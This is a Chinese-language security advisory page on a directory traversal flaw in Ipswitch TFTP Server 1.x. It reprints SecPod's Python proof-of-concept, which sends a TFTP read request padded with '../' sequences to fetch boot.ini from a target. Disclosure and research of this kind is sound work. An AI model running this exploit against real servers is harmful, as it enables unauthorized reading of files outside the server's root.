发布日期:2011-12-02
更新日期:2011-12-05受影响系统:
Ipswitch Ipswitch TFTP Server 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50890Ipswitch TFTP Server是免费的网络系统或配置文件传输工具。Ipswitch TFTP Server在处理包含../序列的Read请求的实现上存在验证错误漏洞,通过目录遍历攻击可导致下载或上传根目录之外的任意文件。<*来源:SecPod Research
链接:http://secpod.org/blog/?p=424
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
##############################################################################
# Title : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor : http://www.whatsupgold.com/index.aspx
# Advisory : http://secpod.org/blog/?p=424
# http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
# http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version : Ipswitch TFTP Server 1.0.0.24
# Date : 02/12/2011
##############################################################################
import sys, socketdef sendPacket(HOST, PORT, data):
"""
Sends UDP Data to a Particular Host on a Specified Port
with a Given Data and Return the Response
"""
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.sendto(data, (HOST, PORT))
data = udp_sock.recv(1024)
udp_sock.close()
return dataif __name__ == "__main__": if len(sys.argv) < 2:
print " Usage: python exploit.py target_ip"
print " Example : python exploit.py 127.0.0.1"
print " Exiting..."
sys.exit(0) HOST = sys.argv[1] ## The Server IP
PORT = 69 ## Default TFTP port data = "x00x01" ## TFTP Read Request
data += "../" * 10 + "boot.ini" + "x00" ## Read boot.ini file using directory traversal
data += "netasciix00" ## TFTP Type ## netascii
rec_data = sendPacket(HOST, PORT, data)
print "Data Found on the target : %s " %(HOST)
print rec_data.strip()建议:
--------------------------------------------------------------------------------
厂商补丁:Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.ipswitch.com/HS TFTP服务器多个远程拒绝服务漏洞CoDeSys多个远程拒绝服务漏洞相关资讯 漏洞 Ipswitch TFTP Server
- 快递官网漏洞泄露 1400 万用户信息 (08/12/2014 08:37:42)
- 要389目录服务器访问绕过漏洞 (10/01/2012 09:18:08)
- ASUS Net4Switch "ipswcom.dll" (03/02/2012 09:32:42)
| - 软件漏洞是一笔大买卖! (10/06/2012 08:28:32)
- PHPCMS V9.1.13任意文件包含漏洞分 (08/01/2012 07:23:17)
- Open Handset Alliance Android (03/01/2012 06:59:34)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受
|